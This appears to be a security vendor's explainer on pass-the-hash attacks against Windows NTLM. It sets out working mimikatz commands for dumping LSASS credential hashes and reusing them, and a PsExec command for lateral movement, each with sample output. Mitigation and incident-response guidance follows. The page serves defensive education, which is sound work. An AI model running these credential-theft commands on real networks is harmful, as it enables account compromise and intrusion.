Once an adversary has gained a foothold in the network, their tactics shift to compromising additional systems and obtaining the privileges they need to complete their mission. Pass-the-hash is a credential theft and lateral movement technique in which an attacker can abuse the challenge-and-response nature of the NTLM authentication protocol to authenticate as a user with only the NTLM hash of the user’s password. The attacker is thus able to use the compromised account without ever obtaining or brute-forcing the plaintext password. Password hashes normally only change when the password itself is changed, granting the adversary significant time to abuse the compromised user(s).
Both ticket-granting service (TGS) tickets and ticket-granting tickets (TGT) can be stolen and reused by adversaries. TGS tickets enable an adversary to access a specific resource described in the ticket, and can be stolen without administrative privileges. TGT’s are more valuable as they are used to request TGS tickets, but require the threat actor to have gained administrative privileges on the computer from which it can be stolen.
Threat Summary
Target:
LM and NTLM-enabled Windows endpoints
Tools:
ATT&CK® Tactic:
ATT&CK Technique:
Difficulty
Detect:
Hard
Mitigate:
Hard
Respond:
Medium
How Pass-the-Hash Works
Hover to see each step
Step 1: There are a number of methods by which an adversary can obtain password hashes once they have gained a foothold in a network. The most common of these is to extract password hashes from the LSASS.exe process memory, which stores hashes for users with active sessions to the computer. In order for this technique to work, the adversary must have compromised administrative privileges to the computer (e.g. the user that opened their phishing email is an administrator of their workstation).
The following example shows an adversary dumping hashes from LSASS. However, it is possible to obtain password hashes in other ways, such as DCSync and extracting hashes from NTDS.dit.
PS> .\mimikatz.exe "privilege::debug" "log passthehash.log" "sekurlsa::logonpasswords" Authentication Id : 0 ; 302247 (00000000:00049ca7) Session : RemoteInteractive from 2 User Name : joed Domain : DOMAIN Logon Server : DC1 Logon Time : 09/07/2020 10:31:19 SID : S-1-5-21-3501040295-3816137123-30697657-1109 msv : [00000003] Primary * Username : joed * Domain : DOMAIN * NTLM : eed224b4784bb040aab50b8856fe9f02 * SHA1 : 42f95dd2a124ceea737c42c06ce7b7cdfbf0ad4b * DPAPI : e75e04767f812723a24f7e6d91840c1d tspkg : wdigest : * Username : joed * Domain : DOMAIN * Password : (null) kerberos : * Username : joed * Domain : domain.com * Password : (null) ssp : credman :
Step 2: Next, the adversary uses the stolen password hash and the pass-the-hash technique to authenticate as the compromised user. While this example demonstrates using the stolen password hash to launch cmd.exe, it is also possible to pass-the-hash directly over the wire to any accessible resource permitting NTLM authentication.
To pass-the-hash using mimikatz sekurlsa::pth the following parameters are specified:
/user:the compromised user’s username/domain:the FQDN of the domain if using a domain account; or, “.” if using a local account/ntlm:,/aes128:, or/aes256:the stolen NTLM, AES-128, or AES-256 password hash
PS> .\mimikatz.exe "sekurlsa::pth /user:JoeD /domain:domain.com /ntlm:eed224b4784bb040aab50b8856fe9f02" user : JoeD domain : domain.com program : cmd.exe impers. : no NTLM : eed224b4784bb040aab50b8856fe9f02 | PID 11560 | TID 10044 | LSA Process is now R/W | LUID 0 ; 58143370 (00000000:0377328a) \_ msv1_0 - data copy @ 000001AE3DDE8A30 : OK ! \_ kerberos - data copy @ 000001AE3DECE9E8 \_ aes256_hmac -> null \_ aes128_hmac -> null \_ rc4_hmac_nt OK \_ rc4_hmac_old OK \_ rc4_md4 OK \_ rc4_hmac_nt_exp OK \_ rc4_hmac_old_exp OK \_ *Password replace @ 000001AE3DFEC428 (32) -> null # New CMD Window Opens
Step 3: Next, an adversary will use their newly acquired privileges to further their objectives. Tools like PSExec may be used to execute commands on remote systems, enabling the attacker to expand their footprint and repeat the cycle of credential theft and lateral movement on an ever growing number of systems.
PS> .\PSExec.exe \server1 cmd.exe PsExec v2.2 - Execute processes remotely Copyright (C) 2001-2016 Mark Russinovich Sysinternals - www.sysinternals.com Microsoft Windows [Version 10.0.17763.1282] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32>hostname server1
Detect, Mitigate, and Respond
Difficulty: Hard
Because pass-the-hash abuses features of the NTLM protocol it cannot be entirely eliminated. However, there are solutions that can make it harder for adversaries to compromise hashes or restrict their ability to use those hashes to move laterally.
- Enable Microsoft’s Windows Defender Credential Guard. Introduced in Windows 10 and Windows Server 2016, Credential Guard builds on top of virtualization to protect credential storage and only permit trusted processes to access them.
- Remove users’ administrator privileges from their workstations, limiting an adversaries ability to execute malware and removing the privileges needed to extract hashes from
LSASS.exe. - Do not allow users to possess administrative privileges to a large number of endpoints. This greatly reduces a credential’s value to an adversary seeking to use it for lateral movement.
- Do not allow users to possess administrative privileges across security boundaries. This greatly reduces the risk that a compromised credential can be used by an adversary to escalate privileges.
- Randomize and store local administrator passwords using a solution like Microsoft’s Local Administrator Password Solution (LAPS). This reduces an adversary’s ability to move laterally with local accounts that share the same password.
- Do not permit local accounts to authenticate over the network. This reduces an adversary’s ability to move laterally with local accounts that share the same password. Two new well-known SIDS were added in Windows 8.1 and Windows 2012R2 and can be used in group policies for this purpose. The SID
S-1-5-113will apply to any local account, while the SIDS-1-5-114will apply to any local account that is also a member of the local Administrators group. - Add privileged domain accounts to the Protected Users group to reduce credential theft risks.
- Configure a host-based firewall (like Windows Defender Firewall) to control and limit which hosts can communicate with which other. For example, in most environments, workstations have little need to communicate directly with other workstations. Using a host-based firewall to block this traffic can limit lateral movement.
Difficulty: Hard
While pass-the-ticket cannot be entirely eliminated, the best mitigations focus on making tickets harder to steal and limiting what a threat actor can do with a stolen ticket:
- Enable Microsoft’s Windows Defender Credential Guard. Introduced in Windows 10 and Windows Server 2016, Credential Guard builds on top of virtualization to protect credential storage and only permit trusted processes to access them.
- Do not allow users to possess administrative privileges to a large number of endpoints. This greatly reduces the risk that an adversary can use a stolen ticket for lateral movement.
- Do not allow users to possess administrative privileges across security boundaries. This greatly reduces the risk that an adversary can use a stolen ticket to escalate their privileges.
Difficulty: Medium
Should a suspected pass-the-hash be detected, there are several actions one can take to immediately respond:
- Activate the incident response process and alert the response team.
- Reset the password for the compromised user, which causes the stolen password hash to become invalid.
- Quarantine the impacted machines for forensic investigation, as well as eradication and recovery activities. Analyze logging to determine whether this computer is patient zero or whether the attacker pivoted to this machine from elsewhere, and whether the attacker pivoted from this machine to another.